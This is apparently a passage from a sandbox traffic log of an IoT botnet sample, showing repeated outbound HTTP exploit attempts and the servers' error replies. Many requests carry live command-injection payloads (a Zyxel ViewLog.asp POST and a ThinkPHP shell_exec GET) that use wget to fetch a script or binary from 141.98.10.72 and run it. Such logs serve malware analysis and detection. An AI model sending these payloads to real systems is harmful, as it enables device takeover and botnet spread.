                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 39 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.19.8</center></body></html>
                                                      Feb 14, 2024 09:30:09.415363073 CET287INHTTP/1.1 400 Bad Request
                                                      Date: Wed, 14 Feb 2024 08:30:09 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 157
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 39 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.19.8</center></body></html>
                                                      Feb 14, 2024 09:30:09.516334057 CET287INHTTP/1.1 400 Bad Request
                                                      Date: Wed, 14 Feb 2024 08:30:09 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 157
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 39 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.19.8</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      529192.168.2.154496085.122.224.2078080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:09.268399000 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      530192.168.2.155108285.90.5.198080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:09.268460989 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:09.480079889 CET490INHTTP/1.1 400 Bad Request
                                                      Content-Type: text/html; charset=us-ascii
                                                      Server: Microsoft-HTTPAPI/2.0
                                                      Date: Wed, 14 Feb 2024 08:30:08 GMT
                                                      Connection: close
                                                      Content-Length: 311
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      531192.168.2.1544192112.85.242.20180
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:09.286324978 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:09.644438982 CET287INHTTP/1.1 400 Bad Request
                                                      Date: Wed, 14 Feb 2024 08:30:09 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 157
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 39 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.19.8</center></body></html>
                                                      Feb 14, 2024 09:30:09.694477081 CET287INHTTP/1.1 400 Bad Request
                                                      Date: Wed, 14 Feb 2024 08:30:09 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 157
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 39 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.19.8</center></body></html>
                                                      Feb 14, 2024 09:30:09.799422979 CET287INHTTP/1.1 400 Bad Request
                                                      Date: Wed, 14 Feb 2024 08:30:09 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 157
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 39 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.19.8</center></body></html>
                                                      Feb 14, 2024 09:30:09.911447048 CET287INHTTP/1.1 400 Bad Request
                                                      Date: Wed, 14 Feb 2024 08:30:09 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 157
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 39 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.19.8</center></body></html>
                                                      Feb 14, 2024 09:30:10.015438080 CET287INHTTP/1.1 400 Bad Request
                                                      Date: Wed, 14 Feb 2024 08:30:09 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 157
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 39 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.19.8</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      532192.168.2.155301894.122.120.878080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:09.295490980 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      533192.168.2.153450485.140.46.728080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:09.296159983 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      534192.168.2.155351694.123.141.2558080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:09.296789885 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      535192.168.2.155084494.123.31.2068080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:09.298470974 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      536192.168.2.153519031.200.35.508080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:09.298683882 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      537192.168.2.155720031.41.198.1868080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:09.341007948 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:09.661058903 CET111INHTTP/1.1 404 Not Found
                                                      Connection: close
                                                      Content-Type: text/plain
                                                      Transfer-Encoding: chunked


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      538192.168.2.154847494.122.61.2338080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:09.791021109 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      539192.168.2.155518494.120.154.1538080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:09.791450024 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      540192.168.2.153456285.140.46.728080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:09.792490005 CET380INHTTP/1.0 400 Bad Request
                                                      Content-Type: text/html
                                                      Server: httpd
                                                      Date: Wed, 14 Feb 2024 11:30:09 GMT
                                                      Connection: close
                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                      Cache-Control: post-check=0, pre-check=0
                                                      Pragma: no-cache
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No request found.</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      541192.168.2.154937695.170.92.2080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:09.848135948 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:10.053066969 CET490INHTTP/1.1 400 Bad Request
                                                      Content-Type: text/html; charset=us-ascii
                                                      Server: Microsoft-HTTPAPI/2.0
                                                      Date: Wed, 14 Feb 2024 08:30:09 GMT
                                                      Connection: close
                                                      Content-Length: 311
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      542192.168.2.153815895.101.203.25080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:09.850044012 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:10.056790113 CET479INHTTP/1.0 400 Bad Request
                                                      Server: AkamaiGHost
                                                      Mime-Version: 1.0
                                                      Content-Type: text/html
                                                      Content-Length: 257
                                                      Expires: Wed, 14 Feb 2024 08:30:09 GMT
                                                      Date: Wed, 14 Feb 2024 08:30:09 GMT
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 37 66 30 31 30 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 34 30 39 26 23 34 36 3b 34 36 35 64 64 35 62 31 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;7f01002&#46;1707899409&#46;465dd5b1</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      543192.168.2.155421295.142.35.9180
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:10.010974884 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:10.378537893 CET307INHTTP/1.1 400 Bad Request
                                                      Server: nginx
                                                      Date: Wed, 14 Feb 2024 08:30:10 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 150
                                                      Connection: close
